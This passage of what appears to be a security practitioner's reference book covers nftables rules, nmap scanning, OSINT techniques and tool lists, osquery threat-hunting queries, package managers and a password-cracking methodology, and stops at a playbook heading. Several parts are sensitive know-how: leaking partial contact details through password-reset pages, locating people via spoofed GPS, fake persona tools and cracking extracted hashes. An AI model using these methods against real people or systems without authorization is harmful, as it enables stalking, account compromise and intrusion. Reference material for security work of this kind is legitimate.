table filter {
chain output {
ip protocol icmp ip daddr [Link] counter packets
5 bytes 420 drop # handle 10
...
Then delete rule 10 with:
nft delete rule filter output handle 10

Flush the filter table:

nft flush table filter

Insert a rule:
nft insert rule filter input tcp dport 80 counter accept

221
Insert or add a rule at a specific position. Get handle of the rule
where to insert or add a new one using the -a flag:
# nft list table filter -n -a
table filter {
chain output {
type filter hook output priority 0;
ip protocol tcp counter packets 82 bytes 9680 #
handle 8
ip saddr [Link] ip daddr [Link] drop #
handle 7
}
}

nft add rule filter output position 8 ip daddr [Link] drop

Added a rule after the rule with handle 8
# nft list table filter -n -a
table filter {
chain output {
type filter hook output priority 0;
ip protocol tcp counter packets 190 bytes 21908 #
handle 8
ip daddr [Link] drop # handle 10
ip saddr [Link] ip daddr [Link] drop #
handle 7
}
}

Add before the rule with a given handle:

nft insert rule filter output position 8 ip daddr [Link] drop

Match filter on a protocol:

nft insert rule filter output ip protocol tcp counter

IPv6
Create IPv6 chains with filter in source:
nft -f files/nftables/ipv6-filter

Add rule:
nft add rule ip6 filter output ip6 daddr [Link] counter

List of the rules:

nft list table ip6 filter

Accept dynamic IPv6 configuration & neighbor discovery:

nft add rule ip6 filter input icmpv6 type nd-neighbor-solicit
accept
nft add rule ip6 filter input icmpv6 type nd-router-advert accept

222
Connection tracking accept all incoming packets of an established
connection:
nft insert rule filter input ct state established accept

Filter on interface accept all packets going out loopback

interface:
nft insert rule filter output oif lo accept

And for packet coming into eth2:

nft insert rule filter input iif eth2 accept

REFERENCE:
[Link]
[Link]
[Link]

N N
NMAP
RED/BLUE TEAM RECON/ASSET DISCOV WINDOWS/LINUX/MacOS
Nmap (Network Mapper) is a free and open-source network scanner and
is used to discover hosts and services on a computer network by
sending packets and analyzing the responses.

COMMAND DESCRIPTION
nmap [Link] Scan a single IP
nmap [Link] Scan a host
nmap [Link]-20 Scan a range of IPs
nmap [Link]/24 Scan a subnet
Scan targets from a
nmap -iL [Link] text file
nmap -p 22 [Link] Scan a single Port
nmap -p 1-100 [Link] Scan a range of ports
Scan 100 most common
nmap -F [Link] ports (Fast)
nmap -p- [Link] Scan all 65535 ports
nmap -sT [Link] Scan using TCP connect
Scan using TCP SYN
nmap -sS [Link] scan (default)
nmap -sU -p 123,161,162 [Link] Scan UDP ports
Scan selected ports -
nmap -Pn -F [Link] ignore discovery
nmap -A [Link] Detect OS and Services
Standard service
nmap -sV [Link] detection
More aggressive
nmap -sV --version-intensity 5 [Link] Service Detection

223
 Lighter banner
nmap -sV --version-intensity 0 [Link] grabbing detection
Save default output to
nmap -oN [Link] [Link] file
nmap -oX [Link] [Link] Save results as XML
Save results in a
nmap -oG [Link] [Link] format for grep
nmap -oA outputfile [Link] Save in all formats
Scan using default
nmap -sV -sC [Link] safe scripts
nmap --script-help=ssl-heartbleed Get help for a script
nmap -sV -p 443 –script=ssl- Scan using a specific
[Link] [Link] NSE script
Scan with a set of
nmap -sV --script=smb* [Link] scripts
Gather page titles
nmap --script=http-title [Link]/24 from HTTP services
Get HTTP headers of
nmap --script=http-headers [Link]/24 web services
Find web apps from
nmap --script=http-enum [Link]/24 known paths
nmap --script=asn-query,whois,ip- Find Information about
geolocation-maxmind [Link]/24 IP address

REFERENCE:
[Link]
[Link]
[Link]
[Link]
[Link]

O
224
O O
OSINT_Techniques
OSINT ENUMERATION N/A

GAP ANALYSIS METHODOLOGY

Gap analysis takes stock of the initial information that you have
and then applies four simple questions to identify what to do next.
This can be applied to bring structure and order to your OSINT
research. The four questions are:

1) What do I know?
2) What does this mean?
3) (So) What do I need to know?
4) How do I find out?

REFERENCE:
[Link]
4th-march-2020/

PASSWORD RESET
Lack of standardization in approaches to password reset functions
which can be used to obtain the partial telephone numbers and
emails of target accounts.

FACEBOOK: You will be met with a screen displaying alternative

contact methods that can be used to reset the password as seen in
the post above. It also accurately uses the number of asterisks
that match the length of the email addresses.

GOOGLE: You will be asked to enter the last password remembered

which can be anything you want and the next screen will display a
redacted recovery phone number with the last 2 digits if one is on
file.

TWITTER: Entering a Twitter username will yield a redacted email

address on file with the first 2 characters of the email username
and the first letter of the email domain. It also accurately uses
the number of asterisks that match the length of the email address.

YAHOO: Will display a redacted alternate email address if on file.

Displays accurate character count as well as first character and
last 2 characters of email username along with full domain.

MICROSOFT: Displays redacted phone number with last 2 digits.

225
PINTEREST: Displays a user's profile as well as a redacted email
address without an accurate character count.

INSTAGRAM: Automatically initiates a reset and emails the user. Do

not use.

LINKEDIN: Automatically initiates a reset and emails the user. Do

not use.

FOURSQUARE: Automatically initiates a reset and emails the user. Do

not use.

REFERENCE:
[Link]

REVERSE IMAGE SEARCHING

TIP: Crop the image to only the object/person you are interested in
finding before uploading to increase accuracy.
TIP: Increase the resolution of your image even if it becomes more
pixelated.
TIP: Best reverse image search engines in order: Yandex, Bing,
Google, TinEye.

Yandex Images
[Link]
Выберите файл (Choose file)
Введите адрес картинки (Enter image address)
Найти (Search)
Похожие картинки (Similar images)
Ещё похожие (More similar)

BING "Visual Search"

[Link]

GOOGLE Images
[Link]

TinEye
[Link]

REFERENCE:
[Link]
reverse-image-search-for-investigations/
[Link]
[Link]
geoprofiling-and-imagery-analysis-6f16bbd5c219

RECENT SATELLITE IMAGERY

226
To pull/view the most recent satellite imagery for:

GOOGLE EARTH Explore New Satellite Imagery Tool

Browse the following:
[Link]
1530.56420216a,14967606.11368418d,35y,-
0h,0t,0r/data=CiQSIhIgOGQ2YmFjYjU2ZDIzMTFlOThiNTM2YjMzNGRiYmRhYTA

MAPBOX LIVE
Browse the following:
[Link]
[Link]?title=true&access_token=pk.eyJ1IjoibWFwYm94IiwiYSI6ImNpejY4
M29iazA2Z2gycXA4N2pmbDZmangifQ.-g_vE53SD2WrJ6tFX7QHmA#4.14/48.73/-
78.55

REFERENCE:
[Link]
[Link]
satellite-imagery/
[Link]
and-machine-learning/
[Link]

CALCULATE PHOTO APPROX TIME OF DAY

Reviewing a photo calculate time of day if you know or can guess
approximate location with the below tools using the sun:
[Link]
[Link]

REFERENCE:
[Link]

FIND TELEGRAMS GROUPS BY LOCATION

1. Use a mobile phone / Android Emulator
2. Download a GPS-spoofer
3. Spoof location to target location
4. Open up Telegram
5. Click on three dots
6. Click on "Contacts"
7. Click on "Add people nearby"
8. Have fun!

REFERENCE:
[Link]

FIND TWITTER ACCOUNTS BY EMAIL

1. Sign in on Gmail
2. Open "Contacts"

227
3. Add email address of target
4. Sign in on Twitter
5. Download "GoodTwitter" add-on
6. Open privacy settings
7. Click "Find friends"
8. Upload Gmail contacts
9. Have fun!

REFERENCE:
[Link]

FIND TWEETS BASED ON LOCATION

1. Find location in Google Maps
2. Right click > "What's here?"
3. Click on GPS coordinates
4. Copy GPS coordinates
5. Go to [Link]
6. Use "geocode:LATT,LONG,0.1km"
7. Have fun!

REFERENCE:
[Link]

SPOOF BROWSER LOCATION GOOGLE CHROME

1. Open dev tools (F12)
2. Click on "Console" tab
3. Click on "ESC" button = "console drawer"
4. Click on "Sensors"
5. Select location/fill in coordinates
6. Have fun!
NOTE: IP address might still reveal your location!

REFERENCE:
[Link]

TikTok PROFILES JSON FORMAT!

1. Navigate to
[Link]
2. replace {username} with username of target
3. Have fun!
> Find profile pic in 720x720 format
> Find follower/liker count
& Scrape it!

Want it in 1080x1080 format?

1. Go to TikTok profile [Link]

2. Open dev tools (F12)
3. Click on "Network tab"
4. Refresh page (F5)
5. Select "XHR" tab

228
6. Double click on "api/user/detail/"
7. Open "AvatarLarger" link
8. Have fun!

REFERENCE:
[Link]

FICTIONAL ACCOUNT CREATION

Autogenerate fictional personas with the below online tools:

This Person Does Not Exist

[Link]

This Resume Does Not Exist

[Link]

This Rental Does Not Exist

[Link]

Fake Name Bio Generator

[Link]

Random User Generator

[Link]

Fake User Generator

[Link]

Dating Profile Generator

[Link]

Fake Persona Generator

[Link]

International Random Name Generator

[Link]

O O
OSINT_Tools
OSINT MISC ONLINE
Online tools broken into categories based on selector search.

ADDRESS
Fast People Search [Link]
GeoNames [Link]
[Link]/reverse-address-
People Finder
[Link]

229
People Search Now [Link]
True People Search [Link]
White Pages [Link]
ANON SEARCH
DuckDuckGo [Link]
Start Page [Link]
Qwant [Link]
BOT/TROLL
Bot Sentinel [Link]
Botometer [Link]
Emergent [Link]
Faker Fact [Link]/try-it-out
Hoaxy [Link]
[Link]/plaform-health-
Iffy Quotient
metrics
Information Operations
Archive [Link]
Twitter Trails [Link]
DOMAIN
Analyze ID [Link]
DNS Trails [Link]
Domain Big Data [Link]
DomainIQ [Link]/snapshot_history
DNS Trails [Link]
Spyse [Link]
ViewDNS Whois [Link]
Whoismind [Link]
Whoisology [Link]
Whoxy [Link]/reverse-whois
EMAIL
Cynic [Link]
Dehashed [Link]
Email Format [Link]
Email Hippo [Link]
Ghost Project [Link]
HaveIBeenPwned [Link]
Hunter [Link]
IntelligenceX [Link]
Leak Probe [Link]
Leaked Source [Link]
Many Contacts [Link]/en/mail-check
PasteBinDump [Link]
Public Mail Records [Link]
Simple Email Reputation [Link]
Spycloud [Link]
Spytox [Link]
TruMail [Link]
Verify Email [Link]
FORENSICS
ExifData [Link]

230
Extract Metadata [Link]
Foto Forensics [Link]
Forensically [Link]/photo-forensics
MetaPicz [Link]
reveal-
Image Verification
[Link]/reveal/[Link]
WayBack Machine [Link]
IMAGE
Baidu Images [Link]
Bing Images [Link]/images
Google Images [Link]
Karma Decay (Reddit) [Link]
TinEye [Link]
Yandex Images [Link]
INFRASTRUCTURE
Analyze ID [Link]
Backlink Checker [Link]/backlink-checker
Built With [Link]
Carbon Dating [Link]
Censys [Link]
Certificate Transparency
Logs [Link]
DNS Dumpster [Link]
DomainIQ [Link]/reverse_analytics
Find Sub Domains [Link]
FOFA [Link]
Follow That Page [Link]
IntelX Google ID [Link]/tools?tab=analytics
MX Toolbox [Link]
Nerdy Data [Link]
pentest-
Pentest Tools [Link]/reconnaissance/find-
subdomains-of-domain
PubDB [Link]
PublicWWW Source Code [Link]
Records Finder [Link]/email
Shared Count [Link]
Shodan [Link]
Similar Web [Link]
Spy On Web [Link]
Spyse [Link]
Thingful (IoT) [Link]
Threat Crowd [Link]
Threat Intelligence
Platform [Link]
URLscan [Link]
Virus Total [Link]
Visual Ping [Link]
Visual Site Mapper [Link]
Wigle [Link]

231
Zoom Eye [Link]
IP ADDRESS
Censys [Link]/ipv4
Exonerator [Link]
IPLocation [Link]
Shodan [Link]
Spyse [Link]
Threat Crowd [Link]
Threat Intelligence
Platform [Link]
UltraTools [Link]
ViewDNS [Link]/reverseip
ViewDNS [Link]/portscan
ViewDNS [Link]/whois
ViewDNS [Link]/iplocation
Virus Total [Link]
IP LOG/SHORTNER
[Link] [Link]
Bitly [Link]
Canary Tokens [Link]
Check Short URL [Link]
Get Notify [Link]
Google URL Shortner [Link]
IP Logger [Link]
Tiny [Link]
URL Biggy [Link]
LIVE CAMERAS
Airport Webcams [Link]
EarthCam [Link]
Opentopia [Link]/[Link]
Open Webcam Network [Link]
Webcam Galore [Link]
WorldCam [Link]
METADATA
Exif Info [Link]
Extract Metadata [Link]
Forensically [Link]/photo-forensics
Get Metadata [Link]
Jeffrey's Exif Viewer [Link]/[Link]
online-barcode-
Online Barcode Reader
reader/[Link]
OPEN DIRECTORY SEARCH
Filer [Link]/gen2/[Link]
File Chef [Link]
File Pursuit [Link]
Mamont [Link]
Open Directory Search
Tool [Link]
Open Directory Search
Portal [Link]/od/

232
Musgle [Link]
Lumpy Soft [Link]
Lendx [Link]
PEOPLE
Family Tree Now [Link]/search
Fast People Search [Link]
Infobel [Link]
Intelius [Link]
Nuwber [Link]
Radaris [Link]
Records Finder [Link]
SearchPeopleFree [Link]
Spytox [Link]
That’s Them [Link]
True People Search [Link]
UFind [Link]
Xlek [Link]
SATELLITE
Bing Maps [Link]/maps
Descartes Labs [Link]
[Link]/dualmaps/[Link]
Dual Maps
m
Google Maps [Link]
Wikimapia [Link]
World Imagery Wayback [Link]/wayback
Yandex Maps [Link]/maps
Zoom Earth [Link]
SOCIAL MEDIA
[Link]
Custom Google Search ?key=AIzaSyB2lwQuNzUsRTH-
Engine 49FA7od4dB_Xvu5DCvg&cx=0017944965319
44888666:iyxger-cwug&q=%22%22
Many Contacts [Link]/en/mail-check
Records Finder [Link]
Social Searcher [Link]
Twitter Advanced [Link]/search-advanced
Who Posted What [Link]
Who Tweeted First [Link]/first
TELEPHONE
Carrier Lookup [Link]
Dehashed [Link]
Everyone API [Link]
Free Carriers Lookup [Link]
Nuwber [Link]
Old Phone Book [Link]
Open CNAM [Link]
People Search Now [Link]
Sly Dial [Link]
Spy Dialer [Link]
Spytox [Link]

233
 That’s Them [Link]
True Caller [Link]
Twilio [Link]/lookup
TOR
Ahmia [Link]
Dark Search [Link]
Tor2Web [Link]
Not Evil (Inside TOR) [Link]
VEHICLE
Nomerogram - RU Plates [Link]
Vin-Info [Link]
World License Plates [Link]
USERNAME
KnowEm [Link]
Name Checkr [Link]
Name Vine [Link]
User Search [Link]

O O
OSINT_Resources
OSINT GUIDES N/A

BELLINGCAT's ONLINE INVESTIGATION TOOLKIT

[Link]

Intel Techniques OSINT Packet

[Link]

Aware Online OSINT Tools

[Link]

OSINT Techniques Tools

[Link]

OSINTCurious 10 Minute Tips

[Link]

Investigative Dashboard
Global index of public registries for companies, land registries
and courts. Search millions of documents and datasets, from public
sources, leaks and investigations. Create visual investigative
scenarios that map the people and companies in your story.
[Link]

I-Intelligence OSINT Resources Handbook

[Link]
content/uploads/2018/06/OSINT_Handbook_June-2018_Final.pdf

234
Week in OSINT (Sector035)
[Link]

AWESOME-OSINT Github
[Link]

Ph055a's OSINT Collection

This is a maintained collection of free actionable resources for
those conducting OSINT investigations.
[Link]

S S
OSINT_SearchEngines
ALL DISCOVERY N/A

BAIDU SEARCH
REFERENCE:
[Link]
In English
[Link] Tips
[Link]

GOOGLE SEARCH
OPERATOR DESCRIPTION
Force an exact-match search. Use this to refine
“search term” results for ambiguous searches, or to exclude
synonyms when searching for single words.
Example: “steve jobs”
Search for X or Y. This will return results
OR related to X or Y, or both. Note: The pipe (|)
operator can also be used in place of “OR.”
Examples: jobs OR gates / jobs | gates
Search for X and Y. This will return only results
related to both X and Y. Note: It doesn’t really
AND make much difference for regular searches, as
Google defaults to “AND” anyway. But it’s very
useful when paired with other operators.
Example: jobs AND gates
Exclude a term or phrase. In our example, any
- pages returned will be related to jobs but
not Apple (the company).
Example: jobs -apple
Acts as a wildcard and will match any word or
*
phrase.
Example: steve * apple

235
 Group multiple terms or search operators to
( )
control how the search is executed.
Example: (ipad OR iphone) apple
Search for prices. Also works for Euro (€), but
$
not GBP (£)
Example: ipad $329
A dictionary built into Google, basically. This
define: will display the meaning of a word in a card-like
result in the SERPs.
Example: define:entrepreneur
Returns the most recent cached version of a web
cache:
page (providing the page is indexed, of course).
Example: cache:[Link]
Restrict results to those of a certain filetype.
E.g., PDF, DOCX, TXT, PPT, etc. Note: The “ext:”
filetype:
operator can also be used—the results are
identical.
Example: apple filetype:pdf / apple ext:pdf
site: Limit results to those from a specific website.
Example: site:[Link]
related: Find sites related to a given domain.
Example: related:[Link]
Find pages with a certain word (or words) in the
intitle: title. In our example, any results containing the
word “apple” in the title tag will be returned.
Example: intitle:apple
Similar to “intitle,” but only results containing
allintitle: all of the specified words in the title tag will
be returned.
Example: allintitle:apple iphone
Find pages with a certain word (or words) in the
inurl: URL. For this example, any results containing the
word “apple” in the URL will be returned.
Example: inurl:apple
Similar to “inurl,” but only results containing
allinurl: all of the specified words in the URL will be
returned.
Example: allinurl:apple iphone
Find pages containing a certain word (or words)
somewhere in the content. For this example, any
intext:
results containing the word “apple” in the page
content will be returned.
Example: intext:apple
Similar to “intext,” but only results containing
allintext: all of the specified words somewhere on the page
will be returned.
Example: allintext:apple iphone
Proximity search. Find pages containing two words
AROUND(X)
or phrases within X words of each other. For this

236
 example, the words “apple” and “iphone” must be
present in the content and no further than four
words apart.
Example: apple AROUND(4) iphone
Find the weather for a specific location. This is
weather: displayed in a weather snippet, but it also
returns results from other “weather” websites.
Example: weather:san francisco
See stock information (i.e., price, etc.) for a
stocks:
specific ticker.
Example: stocks:aapl
Force Google to show map results for a locational
map:
search.
Example: map:silicon valley
Find information about a specific movie. Also
movie: finds movie showtimes if the movie is currently
showing near you.
Example: movie:steve jobs
Convert one unit to another. Works with
in
currencies, weights, temperatures, etc.
Example: $329 in GBP
Find news results from a certain source in Google
source:
News.
Example: apple source:the_verge
Not exactly a search operator, but acts as a
_
wildcard for Google Autocomplete.
Example: apple CEO _ jobs
Search for a range of numbers. In the example
below, searches related to “WWDC videos” are
#..#
returned for the years 2010–2014, but not for
2015 and beyond.
Example: wwdc video 2010..2014
Find pages that are being linked to with specific
anchor text. For this example, any results with
inanchor:
inbound links containing either “apple” or
“iphone” in the anchor text will be returned.
Example: inanchor:apple iphone
Similar to “inanchor,” but only results
allinanchor: containing all of the specified words in the
inbound anchor text will be returned.
Example: allinanchor:apple iphone
loc:placename Find results from a given area.
Example: loc:”san francisco” apple
location: Find news from a certain location in Google News.
Example: loc:”san francisco” apple

REFERENCE:
[Link]
CheatSheet/tree/master/Google

237
[Link]
[Link]

YANDEX
Yandex most standard Boolean operators work (Google operators).

REFERENCE:
[Link]

O O
OSINT_SocialMedia
OSINT RECON ALL

NAME DESCRIPTION LINK

FACEBOOK
Automatically
advanced
searches for
Facebook
[Link]/beta profiles. [Link]/beta
Find posts on
Who posted what? Facebook [Link]
Various tools
for analyzing
Facebook [Link]/[Link]
IntelTechniques profiles/pages. ml
Conduct
Facebook
intersect
Facebook searches across
Intersect Search multiple [Link]/facebook-
Tool variables. intersect-search-tool
Live broadcasts
Facebook Live around the
Map world. [Link]/livemap
Download public
Facebook
[Link] videos. [Link]
peoplefindThor Graph searches. [Link]
Search Is Back! Graph searches. [Link]
Find accounts
by name, email,
screen name, [Link]/[Link]
Search Tool and phone. ml
Automatic
StalkScan advanced [Link]

238
 searches for
your
Download
Video Downloader Facebook
Online videos. [Link]
Social Media
Investigations
- name, phone,
email, username
Skopenow searches. [Link]
INSTAGRAM
View
interactions
and activity of
Instagram
Gramfly users. [Link]
Tool for
downloading
Instagram
StoriesIG stories. [Link]
Allows you to
do a username
search for
Save Instagram stories already [Link]/save-instagram-
Stories saved. [Link]
LINKEDIN
Visualize and
analyze your
own LinkedIn
Socilab network. [Link]
Removes the
overlay that
displays over a [Link]/nl/firef
LinkedIn Overlay LinkedIn ox/addon/linkedin-overlay-
Remover profile. remover/
REDDIT
Sends you an
email when a
keyword is
mentioned on
F5Bot Reddit. [Link]/blog/f5bot/
SNAPCHAT
Searchable map
of geotagged
Snap Map snaps. [Link]
TUMBLR
Find original
posts per [Link]/fun/tumblr_or
Tumblr Originals Tumblr, thus iginals

239
 excluding
reblogs.
TIKTOK
Search TikTok
TikTok Kapi by hashtag. [Link]
TWITTER
Check Twitter
botcheck bots. [Link]
Check Twitter
Botometer bots. [Link]
InVID plugin
Twitter
InVID advanced search
verification by time
plugin interval [Link]/verify
Tweets map per
locations up to
6 hours old,
Onemilliontweetm keyword search
ap option. [Link]
Chrome ext to
visualize
Twitter
Treeverse conversations. [Link]/hGvska63Li
Find reach of
Tweetreach tweets. [Link]
Check Twitter
TwitterAudit bots. [Link]
Twittervideodown Download posted
loader Twitter videos [Link]
Search Twitter
Twitter advanced by date, [Link]/search-
search keywords, etc. advanced
Twitter geobased Twitter
search geocoord search [Link]/twitter/
Python Twitter
scraping tool
followers,
following,
Tweets & while
evading most [Link]/twintproject/twi
twint API limits. nt
Download
tweets,
followers &
Twlets likes [Link]
Geobased
quarter tweets Twitter search [Link]/twitter
CLI tool for
t Twitter [Link]/sferik/t

240
 YOUTUBE
Reverse image [Link]/sites/defaul
Amnesty YouTube search & exact t/custom-
Dataviewer uploading time scripts/citizenevidence
Search YouTube [Link]/geo-
Geo Search Tool on location search-tool/[Link]
Search YouTube
on location, [Link]/youtube-
YouTube Geofind topic, channel geofind/location
Python tool to
download from a
variety of
youtube-dl sources [Link]/youtube-dl/

REFERENCE:
[Link]
GguA/edit#heading=h.dgrpsgxju1wa

O O
OSQUERY
BLUE TEAM THREAT HUNT WINDOWS/LINUX/MacOS
osquery is a tool that exposes an operating system as a high-
performance relational database. It enables developers to write
SQL-based queries that explore operating system data.

Query for top 10 largest processes by resident memory size

select pid, name, uid, resident_size from processes order by
resident_size desc limit 10;

Return process count, name for the top 10 most active processes
select count(pid) as total, name from processes group by name order
by total desc limit 10;

Finding new processes listening on network ports

select distinct [Link], [Link], [Link],
[Link] from processes as process join listening_ports as
listening on [Link] = [Link];

Finding suspicious outbound network activity

select [Link], [Link], local_address, remote_address, family,
protocol, local_port, remote_port from process_open_sockets s join
processes p on [Link] = [Link] where remote_port not in (80, 443) and
family = 2;

Finding processes that are running whose binary has been deleted
from the disk
select name, path, pid from processes where on_disk = 0;

241
Finding specific indicators of compromise (IOCs) in memory or on
disk
select * from file where path = '/dev/ptmx0';

select * from apps where bundle_identifier = '[Link]' or

bundle_identifier like '[Link].%' or bundle_package_type
like 'OSAX';

select * from launchd where label = '[Link]' or label like

'[Link].%' or name = '[Link]' or
name = '[Link]' or name =
'[Link]';

Finding new kernel modules that have loaded

#Run query periodically, diffing against older results
select name from kernel_modules;

Detect processes masquerading as legitimate Windows process

SELECT * FROM processes WHERE LOWER(name)='[Link]' AND
LOWER(path)!='c:\\windows\\system32\\[Link]' AND path!='';

SELECT name FROM processes WHERE pid=(SELECT parent FROM processes

WHERE LOWER(name)='[Link]') AND LOWER(name)!='[Link]';

SELECT * FROM processes WHERE LOWER(name)='[Link]' AND

LOWER(path)!='c:\\windows\\system32\\[Link]' AND
LOWER(path)!='c:\\windows\\syswow64\\[Link]' AND path!='';

SELECT name FROM processes WHERE pid=(SELECT parent FROM processes

WHERE LOWER(name)='[Link]') AND LOWER(name)!='[Link]';

Checks the hashes of accessibility tools to ensure they don't match

the hashes of [Link], [Link], or [Link]
SELECT * FROM hash WHERE (path='c:\\windows\\system32\\[Link]' OR
path='c:\\windows\\system32\\[Link]' OR
path='c:\\windows\\system32\\[Link]' OR
path='c:\\windows\\system32\\[Link]' OR
path='c:\\windows\\system32\\[Link]') AND sha256 IN
(SELECT sha256 FROM hash WHERE
path='c:\\windows\\system32\\[Link]' OR
path='c:\\windows\\system32\\WindowsPowerShell\\v1.0\\[Link]
e' OR path='c:\\windows\\system32\\[Link]') AND
sha256!='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b78
52b855';

Timestamp Inconsistency

242
select path,fn_btime,btime from ntfs_file_data where
device=”\\.\PhysicalDrive0” and partition=3 and
directory=”/Users/<USER>/Desktop/dir” and fn_btime != btime;

select filename, path from ntfs_file_data where

device=”\\.\PhysicalDrive0” and partition=2 and
path=”/Users/<USER>/Downloads” and fn_btime > ctime OR btime >
ctime;

Directory Unused Filename Entries

select parent_path,filename,slack from ntfs_indx_data WHERE
parent_path=”/Users/<USER>/Desktop/test_dir” and slack!=0;

REFERENCE:
[Link]
[Link]
[Link]
detection-dfir/
[Link]
[Link]
[Link]
[Link]

P
P P
PACKAGE MANAGERS
ALL ADMINISTRATION LINUX

apt (deb) Debian, zypp (rpm)

Ubuntu, Mint openSUSE

243
MANAGING SOFTWARE
Install new package
repository apt-get install pkg zypper install pkg
Install new software
from package file dpkg -i pkg zypper install pkg
Update existing zypper update -t
software apt-get install pkg package pkg
Remove unwanted
software apt-get remove pkg zypper remove pkg
UPDATING
apt-get update
Update package list aptitude update zypper refresh
Update System apt-get upgrade zypper update
SEARCHING
Search by package
name apt-cache search pkg zypper search pkg
apt-cache search zypper search -t
Search by pattern pattern pattern pattern
Search by file name apt-file search path zypper wp file
List installed
packages dpkg -l zypper search -is
CONFIGURING
cat
List repositories /etc/apt/[Link] zypper repos
vi zypper addrepo
Add repository /etc/apt/[Link] path name
vi zypper removerepo
Remove repository /etc/apt/[Link] name
urpmi (rpm)
yum (rpm) Fedora Mandriva
MANAGING
Install new package
repository yum install pkg urpmi pkg
Install new software
from package file yum localinstall pkg urpmi pkg
Update existing
software yum update pkg urpmi pkg
Remove unwanted
software yum erase pkg urpme pkg
UPDATING
Update package list yum check-update [Link] -a
urpmi --auto-
Update System yum update select
SEARCHING
Search by package
name yum list pkg urpmq pkg
Search by pattern yum search pattern urpmq --fuzzy pkg
Search by file name yum provides file urpmf file
List installed
packages rpm -qa rpm -qa

244
 CONFIGURING
List repositories yum repolist urpmq --list-media
[Link]
Add repository vi /etc/[Link].d/ name path
[Link]
Remove repository vi /etc/[Link].d/ media

REFERENCE:
[Link]
management/[Link]

P P
PASSWORD CRACKING_Methodology
RED TEAM PASSWORD CRACKING ALL

REQUIRED SOFTWARE
You will want to install the following software on your Windows or
*NIX host. This book does not cover how to install said software
and assumes you were able to follow the included links and
extensive support websites.

HASHCAT v5.1 (or newer)

[Link]

JOHN THE RIPPER (v1.8.0 JUMBO)

[Link]

PACK v0.0.4 (Password Analysis & Cracking Toolkit)

[Link]

Hashcat-utils v1.9
[Link]

Additionally, you will need dictionariesand wordlists. The following

sources are recommended:

WEAKPASS DICTIONARY
[Link]

COMMAND STRUCTURE LEGEND

hashcat = Generic representation of the various Hashcat binary
names
john = Generic representation of the John the Ripper binary names
#type = Hash type; which is an abbreviation in John or a number in
Hashcat
[Link] = File containing target hashes to be cracked
[Link] = File containing dictionary/wordlist
[Link] = File containing permutation rules to alter [Link]
input
[Link] = File containing cracked password results

245
[Link] = File containing results of some functions output

Lastly, as a good reference for testing various hash types to place

into your “[Link]” file, the below sites contain all the various
hashing algorithms and example output tailored for each cracking
tool:

HASHCAT HASH FORMAT EXAMPLES

[Link]

JOHN THE RIPPER HASH FORMAT EXAMPLES

[Link]
[Link]

CORE HASH CRACKING KNOWLEDGE

ENCODING vs HASHING vs ENCRYPTING
Encoding = transforms data into a publicly known scheme for
usability
Hashing = one-way cryptographic function nearly impossible to
reverse
Encrypting = mapping of input data and output data reversible with
a key

CPU vs GPU
CPU = 2-72 cores mainly optimized for sequential serial processing
GPU = 1000’s of cores with 1000’s of threads for parallel
processing

CRACKING TIME = KEYSPACE / HASHRATE

Keyspace: charset^length (?a?a?a?a = 95^4 = 81,450,625)
Hashrate: hashing function / hardware power (bcrypt / GTX1080 =
13094 H/s)
Cracking Time: 81,450,625 / 13094 H/s = 6,220 seconds
*Keyspace displayed and Hashrate vary by tool and hardware
used

SALT = random data that’s used as additional input to a one-way

function
ITERATIONS = the number of times an algorithm is run over a given
hash

HASH IDENTIFICATION: there isn’t a foolproof method for identifying

which hash function was used by simply looking at the hash, but
there are reliable clues (i.e. $6$ sha512crypt). The best method is
to know from where the hash was extracted and identify the hash
function for that software.

246
DICTIONARY/WORDLIST ATTACK = straight attack uses a precompiled
list of words, phrases, and common/unique strings to attempt to
match a password.

BRUTE-FORCE ATTACK = attempts every possible combination of a given

character set, usually up to a certain length.

RULE ATTACK = generates permutations against a given wordlist by

modifying, trimming, extending, expanding, combining, or skipping
words.

MASK ATTACK = a form of targeted brute-force attack by using

placeholders for characters in certain positions
(i.e. ?a?a?a?l?d?d).

HYBRID ATTACK = combines a Dictionary and Mask Attack by taking

input from the dictionary and adding mask placeholders (i.e.
[Link] ?d?d?d).

CRACKING RIG = from a basic laptop to a 64 GPU cluster, this is the

hardware/platform on which you perform your password hash attacks.

EXPECTED RESULTS
Know your cracking rig’s capabilities by performing benchmark
testing. Do not assume you can achieve the same results posted by
forum members without using the exact same dictionary, attack plan,
or hardware setup. Cracking success largely depends on your ability
to use resources efficiently and make calculated trade-offs based
on the target hash.

DICTIONARY/WORDLIST vs BRUTE-FORCE vs ANALYSIS

Dictionaries and brute-force are not the end all be all to crack
hashes. They are merely the beginning and end of an attack plan.
True mastery is everything in the middle, where analysis of
passwords, patterns, behaviors, and policies affords the ability to
recover that last 20%. Experiment with your attacks and research
and compile targeted wordlists with your new knowledge. Do not rely
heavily on dictionaries because they can only help you with what is
“known” and not the unknown.

CRACKING METHODOLOGY
The following is basic cracking methodology broken into steps, but
the process is subject to change based on current/future target
information uncovered during the cracking process.

1-EXTRACT HASHES
Pull hashes from target, identify hashing function, and properly
format output for your tool of choice.

2-FORMAT HASHES

247
Format your hashes based on your tool’s preferred method. See tool
documentation for this guidance. Hashcat, for example, on each line
takes <user>:<hash> OR just the plain <hash>.

3-EVALUATE HASH STRENGTH

Using the Appendix table “Hash Cracking Speed (Slow-Fast)” assess
your target hash and its cracking speed. If it is a slow hash, you
will need to be more selective at what types of dictionaries and
attacks you perform. If it is a fast hash, you can be more liberal
with your attack strategy.

4-CALCULATE CRACKING RIG CAPABILITIES

With the information from evaluating the hash strength, baseline
your cracking rig’s capabilities. Perform benchmark testing using
John The Ripper and/or Hashcat’s built-in benchmark ability on your
rig.

john --test
hashcat -b

Based on these results you will be able to better assess your

attack options by knowing your rigs capabilities against a specific
hash. This will be a more accurate result of a hash’s cracking
speed based on your rig. It will be useful to save these results
for future reference.

5-FORMULATE PLAN
Based on known or unknown knowledge begin creating an attack plan.
Included on the next page is a “Basic Cracking Playbook” to get you
started.

6-ANALYZE PASSWORDS
After successfully cracking a sufficient amount of hashes analyze
the results for any clues or patterns. This analysis may aid in
your success on any remaining hashes.

7-CUSTOM ATTACKS
Based on your password analysis create custom attacks leveraging
those known clues or patterns. Examples would be custom mask
attacks or rules to fit target users’ behavior or preferences.

8-ADVANCED ATTACKS
Experiment with Princeprocessor, custom Markov-chains,
maskprocessor, or custom dictionary attacks to shake out those
remaining stubborn hashes. This is where your expertise and
creativity really come into play.

9-REPEAT
Go back to STEP 4 and continue the process over again, tweaking
dictionaries, mask, parameters, and methods. You are in the grind
at this point and need to rely on skill and luck.

248
 BASIC CRACKING PLAYBOOK
